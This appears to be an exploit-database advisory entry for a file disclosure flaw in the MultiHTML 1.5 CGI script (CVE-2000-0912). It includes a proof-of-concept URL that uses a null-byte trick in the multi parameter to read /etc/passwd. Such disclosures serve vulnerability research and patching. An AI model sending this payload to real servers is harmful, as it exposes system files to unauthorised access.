MultiHTML 1.5 - File Disclosure
Author: Niels Heinen type: webapps platform: cgi port: date_added: 2000-09-13 date_updated: 2012-10-24 verified: 1 codes: CVE-2000-0912;OSVDB-415 tags: aliases: screenshot_url: application_url: raw file: 22204.txt
source: https://www.securityfocus.com/bid/6711/info MultiHTML is prone to a file disclosure vulnerability. It is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software. http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html